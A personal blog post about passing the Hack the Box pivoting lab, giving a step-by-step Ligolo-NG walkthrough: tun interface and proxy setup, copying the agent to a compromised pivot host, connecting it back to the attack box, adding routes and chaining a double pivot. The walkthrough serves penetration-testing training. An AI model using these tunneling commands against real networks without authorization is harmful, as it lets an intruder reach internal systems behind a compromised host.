Pivoting with Ligolo-NG

Just a quick post for Labor Day.

Since January I have been working on the Hack the Box Penetration Testing path. It has been not only educational, but also showed me something that I thought I could not do, I could do. Penetration Testing is taking the troubleshooting skills I have built over 18 years of IT Experience in the real world and showed me how it can be used to make networks stronger and more secure.

It also has showed me how easy it is to break into a Windows system. Though I can’t say it has justified my switch to Linux because it can be just as bad.

I have just completed the Pivoting lab and the one tool I have utterly abused is Ligolo-NG. It made jumping through a network and being able to run my tools from my attack host so, so easy. If you can run the agent, you can get it back as if you are running a VPN. Being able to get back to my tooling on the attack host such as NMap or Remmina makes jumping through labs rather easy.

Probably the biggest challenge I had was making it all work. With that, to add to the pile of Ligolo-NG walkthroughs that exist on the Internet, below is my own.

If you are going through CPTS, I recommend the below cheet sheets and guides. Also, take notes and make your own.

Have fun and 73’s

CPTS-Checklists

Penetration Testing Handbook

Please note, this is what works for me as of 8/1/2025. Things may change.

  • https://docs.ligolo.ng/
  • https://github.com/Nicocha30/ligolo-ng
  • https://medium.com/@redfanatic7/guide-to-pivoting-using-ligolo-ng-efd36b290f16

Its just best to pull the precompiled binaries when you are doing HTB labs. https://github.com/nicocha30/ligolo-ng/releases

Setup on the attack box

Setup your tuntaps (need one for each pivot) sudo ip tuntap add user zac mode tun ligolo1 sudo ip link set ligolo1 up

Start the proxy: sudo ./proxy -selfcert -laddr 0.0.0.0:443

On the Pivot Point

Enumerate what networks you need, in my example 172.16.5.0/24 is the network pass the pivot point

Get your agent there (python http with wget works well, scp is another one)

run the agent (assuming attack host is 10.10.14.74): ./agent -connect 10.10.14.74:443 -ignore-cert

Add in on your attack box the ip: sudo ip route add 172.16.5.0/24 dev ligolo1

In Ligolo, type session and confirm it connected and select it

Type tunnel_start --tun ligolo1

Double-Pivot

In Ligolo on the attack host, when connected to a pivot point session, you can add a listener by doing listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:443

Added in on your attackbox the other network (assuming the IP on the other interface is 172.16.6.35) sudo ip route add 172.16.6.0/24 dev ligolo2

Start the agent, say the pivot point is 172.16.5.15. agent -connect 172.16.5.15:11601 -ignore-cert

Wait at least a minute for the agent to connect a new session, then use session to swap over to it.

Start the tunnel tunnel_start --tun ligolo2

Written on September 1, 2025
Copyright 2025 Zac Treadwell. All Rights Reserved